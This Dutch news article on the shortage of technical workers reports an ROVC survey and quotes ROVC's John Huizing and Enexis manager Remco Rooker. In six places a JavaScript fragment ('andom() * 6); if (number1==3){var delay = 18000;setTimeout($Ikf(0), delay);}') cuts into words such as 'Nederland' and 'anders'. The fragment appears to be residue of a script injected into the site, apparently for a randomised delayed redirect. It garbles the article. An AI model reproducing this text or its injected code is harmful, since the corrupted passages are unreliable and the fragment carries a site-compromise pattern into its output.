Tekort technisch personeel nadelig voor hele maatschappij

Ruim de helft van de technische organisaties verwacht dat het tekort aan technici in de toekomst een negatief effect zal hebben op de concurrentiepositie van Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Dat blijkt uit onderzoek van het ROVC, een aanbieder van technische opleidingen op mbo-niveau. Ook de president van Philips Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, Hans de Jong, heeft gewaarschuwd voor het groeiend tekort aan technisch personeel.

“Werkgevers moeten andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders naar hun personeel zoeken”, vertelt ROVC-directeur John Huizing. “Ze zijn nog te vaak op zoek naar het schaap met de vijf poten: de ideale werknemer die aan alle criteria voldoet. Maar die is er niet meer.” Er zou volgens Huizing meer gekeken moeten worden naar zij-instromers.

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag","image":""}” data-at-player-id=”RBX_AT_13019626″>

John Huizing en Remco Rooker bij EenVandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag

Het ROVC deed onderzoek onder 969 respondenten uit de technische branche. Als belangrijkste oorzaak voor het personeelstekort wordt  een slechte aansluiting van regulier onderwijs op het bedrijfsleven genoemd (30%). Ook een slecht imago van de technische branche (23%) en de vergrijzing (19%) spelen een grote rol.

Techniek is sexy

Remco Rooker, manager Noord-Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and bij netbeheerder Enexis, worstelt met een personeelstekort van bijna 80 man. “Dan heb ik het alleen over Noord-Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.” Volgens Rooker zijn de economische groei en de energietransitie de belangrijkste oorzaken van het tekort. “Ook kiezen te weinig leerlingen voor de techniek”, aldus Rooker. Volgens hem zullen niet alleen bedrijven, maar de hele maatschappij nadelige gevolgen ondervinden van het personeelstekort. “Iedereen gaat dit merken.” Zijn organisatie richt zich nu op de zij-instromers. “Wij zijn door de kaartenbakken van het UWV gegaan om vervolgens mensen om te scholen. We richten ons nu dus op het schaap met drie en een halve poot. Na omscholing zijn dat hele goede werknemers.”

Maar, ook Rooker ziet dat er meer moet gebeuren. “Als bedrijf zijn we er ook verantwoordelijk voor om banen aantrekkelijk te maken. Dat kan bijvoorbeeld door maatwerk te leveren en te kijken naar de wensen van de werknemer. Daarnaast is het belangrijk om te laten zien hoe sexy ons vak eigenlijk is.” 

 

0 antwoorden

Plaats een Reactie

Meepraten?
Draag gerust bij!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *